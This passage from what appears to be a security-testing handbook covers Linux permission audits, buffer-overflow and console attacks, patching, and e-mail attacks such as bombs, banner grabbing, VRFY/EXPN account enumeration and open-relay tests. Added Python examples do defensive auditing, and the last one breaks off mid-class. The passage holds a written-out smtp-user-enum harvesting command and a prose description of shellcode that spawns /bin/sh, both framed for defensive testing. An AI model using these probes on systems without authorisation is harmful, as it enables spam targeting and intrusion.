You can test for rogue programs by using both manual and automated testing methods.
Manual testing
The following commands can identify and print to the screen SetUID and SetGID programs:
Programs that are configured for SetUID: find / -perm -4000 -print
Programs that are configured for SetGID: find / -perm -2000 -print
Files that are writable by anyone in the world: find / -perm -2 -type f -print
Hidden files: find / -name ".*"
You probably have hundreds of files in each of these categories, so don’t be alarmed. When you discover files with these attributes set, you need to make sure that they are actually supposed to have those attributes by researching in your documentation or on the Internet, or by comparing them to a known secure system or data backup.
Keep an eye on your systems to detect any new SetUID or SetGID files that suddenly appear.
Automatic testing
You can use an automated file modification auditing program to alert you when these types of changes are made. This is what I recommend—it’s a lot easier on an ongoing basis:
A change-detection application, such as Open Source Tripwire, can help you keep track of what changed and when.
A file-monitoring program, such as COPS (point your web browser to ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/cops), finds files that have changed in status (such as a new SetUID or removed SetGID).
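The four find commands above give you a snapshot; the automatic-testing advice is to keep a baseline and compare against it. The following is an added example, not code from the book and not Tripwire or COPS: it collects the same four categories with os.walk, stores a baseline of path to mode, and reports files that were added, removed, or changed mode. To be runnable offline it builds a constructed directory tree in a temporary location and then simulates the appearance of a new hidden SetUID file, which is the event the text says to watch for.

```python
# Added example (not from the book): baseline-and-compare for SetUID, SetGID,
# world-writable and hidden files. The directory tree is constructed.
import os
import stat
import tempfile
from typing import Dict, List

Snapshot = Dict[str, int]   # path relative to root -> permission bits


def special_files(root: str) -> Snapshot:
    """Regular files that the four manual find commands would report."""
    found: Snapshot = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue                      # vanished or unreadable; skip
            if not stat.S_ISREG(st.st_mode):
                continue                      # symlinks, sockets, etc.
            interesting = (st.st_mode & stat.S_ISUID      # find / -perm -4000
                           or st.st_mode & stat.S_ISGID   # find / -perm -2000
                           or st.st_mode & stat.S_IWOTH   # find / -perm -2 -type f
                           or name.startswith("."))       # find / -name ".*"
            if interesting:
                found[os.path.relpath(full, root)] = stat.S_IMODE(st.st_mode)
    return found


def describe(rel: str, mode: int) -> List[str]:
    """Tags explaining why a file is in the snapshot."""
    tags = []
    if mode & stat.S_ISUID:
        tags.append("setuid")
    if mode & stat.S_ISGID:
        tags.append("setgid")
    if mode & stat.S_IWOTH:
        tags.append("world-writable")
    if os.path.basename(rel).startswith("."):
        tags.append("hidden")
    return tags


def compare(baseline: Snapshot, current: Snapshot) -> Dict[str, List[str]]:
    """What changed since the baseline was taken."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in both if baseline[p] != current[p]),
    }


def make_sample_tree() -> str:
    """Constructed tree: one legitimate setuid binary, one world-writable file, one dotfile."""
    root = tempfile.mkdtemp(prefix="perm-audit-")
    files = {"bin/passwd": 0o4755, "bin/ls": 0o755,
             "home/jsmith/.bash_history": 0o600, "tmp/scratch.txt": 0o666}
    for rel, mode in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(full, mode)
    return root


def simulate_new_setuid_file(root: str) -> str:
    """Create the kind of file a baseline comparison should catch; returns its relative path."""
    rel = "tmp/.cache"                        # hidden and setuid
    full = os.path.join(root, rel)
    with open(full, "w") as fh:
        fh.write("placeholder\n")
    os.chmod(full, 0o4755)
    return rel


if __name__ == "__main__":
    root = make_sample_tree()
    baseline = special_files(root)
    simulate_new_setuid_file(root)
    for rel in compare(baseline, special_files(root))["added"]:
        print("NEW:", rel, describe(rel, special_files(root)[rel]))
```

Store the baseline snapshot somewhere the monitored host cannot write to (that is the part Tripwire gets right), and review every "added" or "changed" entry the same way the text describes for the manual find output.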
Finding Buffer Overflow Vulnerabilities
RPC and other vulnerable daemons are common targets for buffer-overflow attacks. Buffer overflow attacks are often how the hacker can get in to modify system files, read database files, and more.
Attacks
In a buffer overflow attack, the attacker either manually sends strings of information to the victim Linux machine or writes a script to do so. These strings contain the following:
Instructions to the processor to basically do nothing.
Malicious code to replace the attacked process. For example, exec("/bin/sh") creates a shell command prompt.
A pointer to the start of the malicious code in the memory buffer.
If an attacked application (such as FTP or RPC) is running as root (certain programs do), this situation can give attackers root permissions in their remote shells. Specific examples of vulnerable software running on Linux are Samba, MySQL, and Firefox. Depending on the version, this software can be exploited using commercial or free tools such as Metasploit (www.metasploit.com) to obtain remote command prompts, add backdoor user accounts, change ownership of files, and more. I cover Metasploit in Chapter 12.
Countermeasures against buffer overflow attacks
Three main countermeasures can help prevent buffer-overflow attacks:
Disable unneeded services.
Protect your Linux systems with either a firewall or a host-based intrusion prevention system (IPS).
Enable another access control mechanism, such as TCP Wrappers, that authenticates users with a password.
Don’t just enable access controls via an IP address or hostname. That can easily be spoofed.
As always, make sure that your systems have been updated with the latest kernel and software updates.
Checking Physical Security
Some Linux vulnerabilities involve the bad guy actually being at the system console—something that’s entirely possible given the insider threats that every organization faces.
Physical security hacks
If an attacker is at the system console, anything goes, including rebooting the system (even if no one is logged in) by pressing Ctrl+Alt+Delete. After the system is rebooted, the attacker can start it in single-user mode, which allows the hacker to zero out the root password or possibly even read the entire shadow password file. I cover password cracking in Chapter 8.
Countermeasures against physical security attacks
Edit your /etc/inittab file and comment out (place a # sign in front of) the line that reads ca::ctrlaltdel:/sbin/shutdown -t3 -r now, shown in the last line of Figure 13-9. These changes will prevent someone from rebooting the system by pressing Ctrl+Alt+Delete. Be forewarned that this will also prevent you from legitimately using Ctrl+Alt+Delete.
Figure 13-9: /etc/inittab showing the line that allows a Ctrl+Alt+Delete shutdown.
For Linux-based laptops, use disk encryption software, such as WinMagic (www.winmagic.com) and Symantec (www.symantec.com). If you don’t, when a laptop is lost or stolen, you could very well have a data breach on your hands and all the state, federal, compliance, and disclosure law requirements that go along with it. Not good!
If you believe that someone has recently gained access to your system, either physically or by exploiting a vulnerability, such as a weak password or buffer overflow, you can use the last program to view the last few logins into the system to check for strange login IDs or login times. This program peruses the /var/log/wtmp file and displays the users who logged in last. You can enter last | head to view the first part of the file (the first ten lines) if you want to see the most recent logins.
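Eyeballing last output works for ten lines; for a full wtmp it helps to state what "strange" means and let a script apply it. The following is an added example, not code from the book: it parses the columns of last output (the sample lines are constructed, in the layout last prints on Linux), skips the reboot and shutdown pseudo-users, and flags logins outside business hours, at weekends, or from an address outside the networks you list as trusted. The business-hours window and the trusted networks are assumptions you would set for your own site.

```python
# Added example (not from the book): flag unusual logins in "last" output.
# Sample output, trusted networks and business hours are constructed/assumed.
import ipaddress
import re
from typing import Dict, List, Sequence, Tuple

SAMPLE_LAST = """\
jsmith   pts/0        10.0.0.9         Mon Mar  7 09:12   still logged in
jsmith   pts/1        10.0.0.9         Mon Mar  7 08:55 - 09:10  (00:15)
backup   tty1                          Sun Mar  6 03:41 - 03:44  (00:03)
root     pts/2        203.0.113.44     Sat Mar  5 02:17 - 02:19  (00:02)
reboot   system boot  4.4.0-generic    Fri Mar  4 18:02 - 09:30 (2+15:28)

wtmp begins Fri Mar  4 18:02:03 2016
"""

# user, tty (may contain a space, e.g. "system boot"), optional host, then the date.
LINE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>.+?)\s+(?P<host>\S*?)\s+"
    r"(?P<day>Mon|Tue|Wed|Thu|Fri|Sat|Sun) (?P<mon>[A-Z][a-z]{2})\s+(?P<dom>\d+) (?P<time>\d\d:\d\d)"
)
PSEUDO_USERS = {"reboot", "shutdown"}


def parse_last(output: str) -> List[Dict[str, str]]:
    """One dict per real login session; trailer lines and pseudo-users are dropped."""
    sessions = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("user") not in PSEUDO_USERS:
            sessions.append(m.groupdict())
    return sessions


def suspicious_logins(output: str, trusted_nets: Sequence[str],
                      business_hours: Tuple[int, int] = (7, 19)
                      ) -> List[Tuple[str, str, List[str]]]:
    """(user, host, reasons) for sessions that break any of the site rules."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    start, end = business_hours
    flagged = []
    for s in parse_last(output):
        reasons = []
        if not start <= int(s["time"][:2]) < end:
            reasons.append(f"outside business hours ({s['time']})")
        if s["day"] in ("Sat", "Sun"):
            reasons.append(f"weekend login ({s['day']})")
        if s["host"]:                                  # empty host = local console
            try:
                ip = ipaddress.ip_address(s["host"])
            except ValueError:
                reasons.append(f"host {s['host']!r} is not an IP address; check it by name")
            else:
                if not any(ip in net for net in nets):
                    reasons.append(f"host {s['host']} not in trusted networks")
        if reasons:
            flagged.append((s["user"], s["host"], reasons))
    return flagged


if __name__ == "__main__":
    for user, host, reasons in suspicious_logins(SAMPLE_LAST, ["10.0.0.0/8"]):
        print(f"{user:<8} {host or 'console':<16} {'; '.join(reasons)}")
```

Feed it the real thing with last > wtmp.txt and read the file into suspicious_logins; a root login from an unknown address at two in the morning, as in the constructed sample, is the sort of line you want surfaced rather than scrolled past.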
Performing General Security Tests
You can assess critical, and often overlooked, security issues on your Linux systems, such as the following:
Misconfigurations or unauthorized entries in the shadow password files, which could provide covert system access
Password complexity requirements
Users equivalent to root
Suspicious automated tasks configured in cron, the script scheduler program
Signature checks on system binary files
Checks for rootkits
Network configuration, including measures to prevent packet spoofing and other denial of service (DoS) attacks
Permissions on system log files
You can do all these assessments manually—or better yet, use an automated tool to do it for you! Figure 13-10 shows the initiation of the Tiger security-auditing tool (www.nongnu.org/tiger), and Figure 13-11 shows a portion of the audit results. Talk about some great bang for no buck with this tool!
Figure 13-10: Running the Tiger security-auditing tool.
Figure 13-11: Partial output of the Tiger tool.
Alternatives to Tiger include Linux Security Auditing Tool (LSAT; http://usat.sourceforge.net) as well as Bastille UNIX (http://bastille-linux.sourceforge.net).
Patching Linux
Ongoing patching is perhaps the best thing you can do to enhance and maintain the security of your Linux systems. Regardless of the Linux distribution you use, using a tool to assist in your patching efforts makes your job a lot easier.
I often find Linux is completely out of the patch management loop. With the focus on patching Windows, many network administrators forget about the Linux systems they have on their network. Don’t fall into this trap.
Distribution updates
The update process is different on every distribution of Linux. You can use the following tools, based on your specific distribution:
Red Hat: The following tools update Red Hat Linux systems:
RPM Package Manager, which is the GUI-based application that runs in the Red Hat GUI desktop. It manages files with an .rpm extension that Red Hat and other freeware and open source developers use to package their programs. RPM Package Manager was originally a Red Hat-centric system but is now available on many versions of Linux.
up2date, a command-line, text-based tool that’s included in Red Hat, Fedora, and CentOS.
Debian: You can use the Debian package management system (dpkg) included with the operating system to update Debian Linux systems.
Slackware: You can use the Slackware Package Tool (pkgtool) included with the operating system to update Slackware Linux systems.
SUSE: SUSE Linux includes YaST2 software management.
In addition to Linux kernel and general operating system updates, make sure you pay attention to Apache, OpenSSL, OpenSSH, MySQL, PHP, and other software on your systems. They may have weaknesses that you don’t want to overlook.
Multi-platform update managers
Commercial tools have additional features, such as correlating patches with vulnerabilities and automatically deploying appropriate patches. Commercial tools that can help with Linux patch management include ManageEngine (www.manageengine.com/products/desktop-central/linux-management.html), GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/specifications/patch-management-for-operating-systems), and Dell KACE Systems Management Appliance (http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx).
Hacking Applications
Read even more great Dummies content at www.dummies.com/extras/hacking.
In this part…
Well, this book has covered all the essential security tests from the nontechnical to the network and on to mobile devices and operating systems. What I haven’t yet covered are the applications that run on top of all this as well as database servers and storage systems that ensure the data is available when we need it.
The first chapter in this part covers various messaging system hacks and countermeasures for e-mail and Voice over IP (VoIP) systems. Next, this part looks at web exploits, along with some countermeasures to secure websites and applications from the elements. Finally, this part covers attacks against database servers and storage systems. It covers both structured data found in various database systems and unstructured data, otherwise known as files scattered across the network waiting to be exploited.
Communication and Messaging Systems
In This Chapter
Attacking e-mail systems
Assailing instant messaging
Assaulting Voice over IP applications
Communication systems such as e-mail and Voice over IP (VoIP) often create vulnerabilities that people overlook. Why? Well, from my experience, messaging software—both at the server and client level—is vulnerable because network administrators often believe that firewalls and antivirus software are all that’s needed to keep trouble away, or they simply forget about securing these systems altogether.
In this chapter, I show you how to test for common e-mail and VoIP issues. I also outline key countermeasures to help prevent these hacks against your systems.
Introducing Messaging System Vulnerabilities
Practically all messaging applications are hacking targets on your network. Given the proliferation and business dependence on e-mail, just about anything is fair game. Ditto with VoIP. It’s downright scary what people with ill intent can do with it.
With messaging systems, one underlying weakness is that many of the supporting protocols weren’t designed with security in mind—especially those developed several decades ago when security wasn’t nearly the issue it is today. The funny thing is that even modern-day messaging protocols—or at least the implementation of the protocols—are still susceptible to serious security problems. Furthermore, convenience and usability often outweigh the need for security.
Many attacks against messaging systems are just minor nuisances; others can inflict serious harm on your information and your organization’s reputation. Malicious attacks against messaging systems include the following:
Transmitting malware
Crashing servers
Obtaining remote control of workstations
Capturing information while it travels across the network
Perusing e-mails stored on servers and workstations
Gathering messaging-trend information via log files or a network analyzer that can tip off the attacker about conversations between people and organizations (often called traffic analysis or social network analysis)
Capturing and replaying phone conversations
Gathering internal network configuration information, such as hostnames and IP addresses
These attacks can lead to such problems as unauthorized—and potentially illegal—disclosure of sensitive information, as well as loss of information altogether.
Recognizing and Countering E-Mail Attacks
The following attacks exploit the most common e-mail security vulnerabilities I’ve seen. The good news is that you can eliminate or minimize most of them to the point where your information is not at risk. Some of these attacks require the basic hacking methodologies: gathering public information, scanning and enumerating your systems, and finding and exploiting the vulnerabilities. Others can be carried out by sending e-mails or capturing network traffic.
E-mail bombs
E-mail bombs attack by creating denial of service (DoS) conditions against your e-mail software and even your network and Internet connection by taking up a large amount of bandwidth and, sometimes, requiring large amounts of storage space. E-mail bombs can crash a server and provide unauthorized administrator access—yes, even with today’s seemingly endless storage capacities.
Attachments
An attacker can create an attachment-overload attack by sending hundreds or thousands of e-mails with very large attachments to one or more recipients on your network.
Attacks using e-mail attachments
Attachment attacks have a couple of goals:
The whole e-mail server might be targeted for a complete interruption of service with these failures:
Storage overload: Multiple large messages can quickly fill the total storage capacity of an e-mail server. If the messages aren’t automatically deleted by the server or manually deleted by individual user accounts, the server will be unable to receive new messages.
This can create a serious DoS problem for your e-mail system, either crashing it or requiring you to take your system offline to clean up the junk that has accumulated. A 100MB file attachment sent ten times to 100 users can take 100GB of storage space. That can add up!
Bandwidth blocking: An attacker can crash your e-mail service or bring it to a crawl by filling the incoming Internet connection with junk. Even if your system automatically identifies and discards obvious attachment attacks, the bogus messages eat resources and delay processing of valid messages.
An attack on a single e-mail address can have serious consequences if the address is for an important user or group.
Countermeasures against e-mail attachment attacks
These countermeasures can help prevent attachment-overload attacks:
Limit the size of either e-mails or e-mail attachments. Check for this option in your e-mail server’s configuration settings (such as those provided in Microsoft Exchange), your e-mail content filtering system, and even at the e-mail client level.
Limit each user’s space on the server. This denies large attachments from being written to disk. Limit message sizes for inbound and even outbound messages should you want to prevent a user from launching this attack from inside your network. I find a few gigabytes is a good limit, but it all depends on your network size, storage availability, business culture, and so on, so think through this one carefully before putting anything in place.
Consider using SFTP or HTTP instead of e-mail for large file transfers. There are numerous cloud-based file transfer services available such as Dropbox and Box. You can also encourage your users to use departmental shares or public folders. By doing so, you can store one copy of the file on a server and have the recipient download the file on his or her own workstation.
Contrary to popular belief and use, the e-mail system should not be an information repository, but that’s exactly what e-mail has evolved into. An e-mail server used for this purpose can create unnecessary legal and regulatory risks and can turn into a downright nightmare if your business receives an e-discovery request related to a lawsuit. An important part of your security program is to develop an information classification and retention program to help with records management. But don’t go it alone. Get others such as your lawyer, HR manager, and CIO involved. This not only helps ensure the right people are on board but it can help ensure your business doesn’t get into trouble for holding too many—or too few—electronic records in the event of a lawsuit or investigation.
Connections
A hacker can send a huge number of e-mails simultaneously to addresses in your e-mail system. Malware that’s present on your network can do the same thing from inside your network if there’s an open Simple Mail Transfer Protocol (SMTP) relay on your network (which is often the case). (More about that follows.) These connection attacks can cause the server to give up on servicing any inbound or outbound TCP requests. This situation can lead to a complete server lockup or a crash, often resulting in a condition in which the attacker is allowed administrator or root access to the system.
Attacks using floods of e-mails
An attack using a flood of e-mails is often carried out in spam attacks and other denial of service attempts.
Countermeasures against connection attacks
Prevent e-mail attacks as far out on your network perimeter as you can. The more traffic or malicious behavior you keep off your e-mail servers and clients, the better.
Many e-mail servers allow you to limit the number of resources used for inbound connections, as shown in the Maximum number of simultaneous threads setting for IceWarp e-mail server in Figure 14-1. This setting is called different things for different e-mail servers and e-mail firewalls, so check your documentation. Completely stopping an unlimited number of inbound requests can be impossible. However, you can minimize the impact of the attack. This setting limits the amount of server processor time, which can help during a DoS attack.
Figure 14-1: Limiting the number of resources that handle inbound messages.
Even in large companies, or if you’re using a cloud-based e-mail service such as Office 365, there’s likely no reason that thousands of inbound e-mail deliveries should be necessary within a short time period.
E-mail servers can be programmed to deliver e-mails to a service for automated functions, such as create this e-commerce order when a message from this account is received. If DoS protection isn’t built into the system, an attacker can crash both the server and the application that receives these messages and potentially create e-commerce liabilities and losses. This can happen more easily on e-commerce websites when CAPTCHA (short for Completely Automated Public Turing test to tell Computers and Humans Apart) is not used on forms. I cover web application security in Chapter 15.
Automated e-mail security controls
You can implement the following countermeasures as an additional layer of security for your e-mail systems:
Tarpitting: Tarpitting detects inbound messages destined for unknown users. If your e-mail server supports tarpitting, it can help prevent spam or DoS attacks against your server. If a predefined threshold is exceeded—say, more than 100 messages in one minute—the tarpitting function effectively shuns traffic from the sending IP address for a period of time.
E-mail firewalls: E-mail firewalls and content-filtering applications from vendors such as Symantec and Barracuda Networks can go a long way towards preventing various e-mail attacks. These tools protect practically every aspect of an e-mail system.
Perimeter protection: Although not e-mail-specific, many firewall and IPS systems can detect various e-mail attacks and shut off the attacker in real time. This can come in handy during an attack.
CAPTCHA: Using CAPTCHA on web-based e-mail forms can help minimize the impact of automated attacks and lessen your chances of e-mail flooding and denial of service—even when you’re performing seemingly benign web vulnerability scans. These benefits really come in handy when testing your websites and applications, as I discuss in Chapter 15.
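The tarpitting rule above is a sliding-window counter per sending address: count deliveries to unknown recipients, and once more than the threshold arrive within the window, refuse that sender for a while. The following is an added example, not code from the book or any particular mail server, that implements exactly that rule so you can see how the threshold, window and shun period interact; the threshold and timings are the ones the text uses as illustration, and the sender addresses are constructed. Messages to known recipients are never counted, so a busy but legitimate sender is not affected.

```python
# Added example (not from the book): sliding-window tarpitting for an SMTP
# front end. Thresholds below follow the text's illustration (100 per minute).
import collections
from typing import Deque, Dict


class TarpitMonitor:
    def __init__(self, threshold: int = 100, window: float = 60.0, shun_for: float = 600.0):
        self.threshold = threshold          # attempts to unknown users allowed per window
        self.window = window                # seconds
        self.shun_for = shun_for            # seconds a sender stays refused
        self._attempts: Dict[str, Deque[float]] = collections.defaultdict(collections.deque)
        self._shunned_until: Dict[str, float] = {}

    def is_shunned(self, now: float, src_ip: str) -> bool:
        """True while the sender is inside its shun period; expiry is lazy."""
        until = self._shunned_until.get(src_ip)
        if until is None:
            return False
        if now >= until:
            del self._shunned_until[src_ip]
            return False
        return True

    def record(self, now: float, src_ip: str, recipient_known: bool) -> bool:
        """Record one delivery attempt; return True if it should be refused."""
        if self.is_shunned(now, src_ip):
            return True
        if recipient_known:
            return False                    # only unknown-recipient attempts count
        attempts = self._attempts[src_ip]
        attempts.append(now)
        while attempts and attempts[0] <= now - self.window:
            attempts.popleft()              # drop attempts older than the window
        if len(attempts) > self.threshold:
            self._shunned_until[src_ip] = now + self.shun_for
            attempts.clear()
            return True
        return False


if __name__ == "__main__":
    monitor = TarpitMonitor()
    # Constructed flood: one address probing 120 unknown mailboxes, two per second.
    refused = [monitor.record(i * 0.5, "198.51.100.7", recipient_known=False) for i in range(120)]
    print("first refusal at attempt", refused.index(True) + 1)
```

A real server would log the shun event with the sender address and count so the SIEM can correlate it with the perimeter controls mentioned above; what it should not do is reveal to the sender which addresses were unknown, which is the account-enumeration problem covered later in this chapter.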
Banners
When hacking an e-mail server, a hacker’s first order of business is performing a basic banner grab to see whether he can discover what e-mail server software is running. This is one of the most critical tests to find out what the world knows about your SMTP, POP3, and IMAP servers.
Gathering information
Figure 14-2 shows the banner displayed on an e-mail server when a basic telnet connection is made on port 25 (SMTP). To do this, at a command prompt, simply enter telnet ip_or_hostname_of_your_server 25. This opens a telnet session on TCP port 25.
Figure 14-2: An SMTP banner showing server-version information.
The e-mail software type and server version are often very obvious and give hackers some ideas about possible attacks, especially if they search a vulnerability database for known vulnerabilities of that software version. Figure 14-3 shows the same e-mail server with its SMTP banner changed from the default (okay, the previous one was, too) to disguise such information as the e-mail server’s version number.
Figure 14-3: An SMTP banner that disguises the version information.
You can gather information on POP3 and IMAP e-mail services by telnetting to port 110 (POP3) or port 143 (IMAP).
If you change your default SMTP banner, don’t think that no one can figure out the version. General vulnerability scanners can often detect the version of your e-mail server. One Linux-based tool called smtpscan (www.freshports.org/security/smtpscan/) determines e-mail server version information based on how the server responds to malformed SMTP requests. Figure 14-4 shows the results from smtpscan against the same server shown in Figure 14-3. The smtpscan tool detected the product and version number of the e-mail server.
Figure 14-4: smtpscan gathers version info even when the SMTP banner is disguised.
Countermeasures against banner attacks
There isn’t a 100 percent secure way of disguising banner information. I suggest these banner security tips for your SMTP, POP3, and IMAP servers:
Change your default banners to conceal the information.
Make sure that you’re always running the latest software patches.
Harden your server as much as possible by using well-known best practices from such resources as the Center for Internet Security (www.cisecurity.org) and NIST (http://csrc.nist.gov).
SMTP attacks
Some attacks exploit weaknesses in SMTP. This e-mail communication protocol—which is over three decades old—was designed for functionality, not security.
Account enumeration
A clever way that attackers can verify whether e-mail accounts exist on a server is simply to telnet to the server on port 25 and run the VRFY command. The VRFY command (short for verify) makes a server check whether a specific user ID exists. Spammers often automate this method to perform a directory harvest attack (DHA), which is a way of gleaning valid e-mail addresses from a server or domain so hackers know whom to send spam, phishing, or malware-infected messages to.
Attacks using account enumeration
Figure 14-5 shows how easy it is to verify an e-mail address on a server with the VRFY command enabled. Scripting this attack can test thousands of e-mail address combinations.
Figure 14-5: Using VRFY to verify that an e-mail address exists.
The SMTP command EXPN (short for expand) might allow attackers to verify what mailing lists exist on a server. You can simply telnet to your e-mail server on port 25 and try EXPN on your system if you know of any mailing lists that might exist. Figure 14-6 shows how the result might look. Scripting this attack and testing thousands of mailing list combinations is simple.
Figure 14-6: Using EXPN to verify that a mailing list exists.
You might get bogus information from your server when performing these two tests. Some SMTP servers (such as Microsoft Exchange) don't support the VRFY and EXPN commands, and some e-mail firewalls simply ignore them or return false information. Read the reply codes rather than the text: 250 confirms the name, 550 denies it, and a 252 reply ("cannot verify, but will accept the message") tells you nothing either way.
Another way to somewhat automate the process is to use the EmailVerify program in TamoSoft's Essential NetTools (www.tamos.com/products/nettools). As shown in Figure 14-7, you simply enter an e-mail address, click Start, and EmailVerify connects to the server and pretends to send an e-mail.
Figure 14-7: Using EmailVerify to verify an e-mail address.
Yet another way to capture valid e-mail addresses is to use theHarvester (https://github.com/laramies/theHarvester) to glean addresses via Google and other search engines. As I outline in Chapter 9, you can download Kali Linux from www.kali.org to burn the ISO image to CD or boot the image directly through VMware or VirtualBox. In the Kali Linux GUI, simply choose Applications ⇒ Information Gathering ⇒ SMTP Analysis ⇒ smtp-user-enum and enter smtp-user-enum -M VRFY -u <username you wish to confirm> -t serverIP/hostname, as shown in Figure 14-8.
Figure 14-8: Using smtp-user-enum for gleaning e-mail addresses.
You can customize smtp-user-enum queries as well using, for example, EXPN in place of VRFY and -U and a list of usernames in a file to query more than one user. Simply enter smtp-user-enum for all the search options.
Countermeasures against account enumeration
If you're running Exchange, VRFY and EXPN enumeration won't be an issue because the server doesn't support the commands. Otherwise, the best solution for preventing this type of e-mail account enumeration depends on whether you need to enable the VRFY and EXPN commands:
Disable VRFY and EXPN unless you need your remote systems to gather user and mailing list information from your server.
If you need VRFY and EXPN functionality, check your e-mail server or e-mail firewall documentation for the ability to limit these commands to specific hosts on your network or the Internet.
Finally, work with your marketing team and web developers to ensure that company e-mail addresses are not posted on your organization's website or on social media websites. Also, educate your users about not doing this.
Relay
SMTP relay lets users send e-mails through external servers. Open e-mail relays aren't the problem they used to be, but you still need to check for them. Spammers and criminal hackers can use an e-mail server to send spam or malware through e-mail under the guise of the unsuspecting open-relay owner.
Be sure to test for open relay from both outside and inside your network. If you test your internal systems, you might get false positives because outbound e-mail relaying might be configured and necessary for your internal e-mail clients to send messages to the outside world. However, if a client system is compromised, that issue could be just what the bad guys need to launch a spam or malware attack.
Automatic testing
Here are a couple of easy ways to test your server for SMTP relay:
Vulnerability scanners: Many vulnerability scanners such as Nexpose and QualysGuard will find open e-mail relay vulnerabilities.
Windows-based tools: One example is NetScanTools Pro (www.netscantools.com). You can run an SMTP Relay check on your e-mail server with NetScanTools Pro, as shown in Figure 14-9.
Although some SMTP servers accept inbound relay connections and make it look like relaying works, this isn't always the case because the initial connection might be allowed, but the filtering actually takes place behind the scenes. Check whether the e-mail actually made it through by checking the account you sent the test relay message to.
Figure 14-9: Using NetScanTools Pro SMTP Server Tests to check for an open e-mail relay.
In NetScanTools Pro, you simply enter values for the SMTP mail server name and Your Sending Domain Name. Inside Test Message Settings, enter the Recipient Email Address and Sender's Email Address. If the test is successful, NetScanTools Pro will open a window that says "Message Sent Successfully."
You can also view the results in the main SMTP Server Tests window and generate a formal report by simply clicking View Results in a Web Browser and then clicking View Relay Test Results.
Manual testing
You can manually test your server for SMTP relay by telnetting to the e-mail server on port 25. Follow these steps:
1. Telnet to your server on port 25.
You can do this in two ways:
Use your favorite graphical telnet application, such as HyperTerminal (which came with older versions of Windows) or SecureCRT (www.vandyke.com/products/securecrt/index.html).
Enter the following command at a Windows or Linux command prompt:
telnet mailserver_address 25
You should see the SMTP welcome banner when the connection is made.
2. Enter a command to tell the server, "Hi, I'm connecting from this domain."
For example: helo yourdomain.com
After each command in these steps, you should receive a numbered reply, such as 250 OK. You can ignore these replies until Step 8.
3. Enter a command to tell the server your e-mail address.
For example: mail from:[email protected]
4. Enter a command to tell the server who to send the e-mail to.
For example: rcpt to:[email protected]
Any sender address will do, but the recipient matters: use an address at a domain this server doesn't handle mail for, such as your own external mailbox. If you use a local address, you're testing local delivery, not relaying.
5. Enter a command to tell the server that the message body is to follow.
For example: data
6. Enter the following text as the body of the message: A relay test!
7. End the command with a period on a line by itself.
You can enter ? or help at the first telnet prompt to see a list of all the supported commands and, depending on the server, get help on the use of the commands.
The final period marks the end of the message. After you enter this final period, your message will be sent if relaying is allowed.
8. Check for relaying on your server:
Look for a message similar to Relay not allowed coming back from the server.
If you get a message similar to this, SMTP relaying is either not allowed on your server or is being filtered because many servers block messages that appear to originate from the outside yet come from the inside.
You might get this message after you enter the rcpt to: command.
If you don't receive a message from your server, check your Inbox for the relayed e-mail.
If you receive the test e-mail you sent, SMTP relaying is enabled on your server and probably needs to be disabled. The last thing you want is to let spammers or other attackers make it look like you're sending tons of spam, or worse, to be blacklisted by one or more of the blacklist providers. Ending up on a blacklist can disrupt e-mail sending and receiving—not good for business!
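The account-enumeration checks and the manual relay test above are easy to script, and scripting them is the only practical way to run them against more than a handful of names or hosts. The following is an added example, not code from the book: a small Python 3 client that issues VRFY or EXPN for a list of names and classifies the reply codes, and a function that walks the HELO, MAIL FROM, RCPT TO, DATA sequence and reports whether the server queued a message for an outside domain. Because it has to run offline, it also carries a constructed fake SMTP server; its user list, the example.com local domain, the scanner.example.net HELO name and the addresses in the usage call are all assumptions, and a 252 reply is treated as inconclusive because the server is declining to say either way.

```python
import socket
import threading

# Constructed fake SMTP server so the checks below run offline. It is not a
# real MTA; the user list, local domain and relay policy are assumptions.
KNOWN_USERS = {"postmaster", "webmaster"}
LOCAL_DOMAIN = "example.com"

def _serve_client(conn, open_relay):
    def send(line):
        conn.sendall((line + "\r\n").encode())
    send("220 mail.example.com ESMTP")
    in_data = False
    for raw in conn.makefile("rb"):
        line = raw.decode(errors="replace").rstrip("\r\n")
        if in_data:                      # swallow the body until a lone "."
            in_data = line != "."
            if not in_data:
                send("250 2.0.0 Ok: queued")
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            send("250 mail.example.com")
        elif verb == "VRFY":             # 250 = exists, 550 = no such user
            user = arg.strip("<>").split("@")[0]
            send("250 <%s@%s>" % (user, LOCAL_DOMAIN) if user in KNOWN_USERS
                 else "550 5.1.1 User unknown")
        elif verb == "MAIL":
            send("250 2.1.0 Ok")
        elif verb == "RCPT":             # the relay policy lives here
            domain = arg.rsplit("@", 1)[-1].rstrip(">").lower()
            send("250 2.1.5 Ok" if open_relay or domain == LOCAL_DOMAIN
                 else "554 5.7.1 Relay access denied")
        elif verb == "DATA":
            send("354 End data with <CR><LF>.<CR><LF>")
            in_data = True
        elif verb == "QUIT":
            send("221 2.0.0 Bye")
            break
        else:                            # EXPN and anything else: unsupported
            send("502 5.5.2 Command not implemented")
    conn.close()

def start_fake_server(open_relay=False):
    """Listen on an ephemeral 127.0.0.1 port; returns (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_client, args=(conn, open_relay), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()

class SmtpProbe:
    """Minimal SMTP client: send one command line, get back the numeric reply code."""
    def __init__(self, host, port, timeout=5):
        self.sock = socket.create_connection((host, port), timeout)
        self.reader = self.sock.makefile("rb")
        self.reply()                     # consume the 220 greeting (the banner)
    def reply(self):
        while True:
            line = self.reader.readline().decode(errors="replace")
            if len(line) < 4 or line[3] != "-":   # "250-" continues, "250 " ends
                return int(line[:3]) if line[:3].isdigit() else 0
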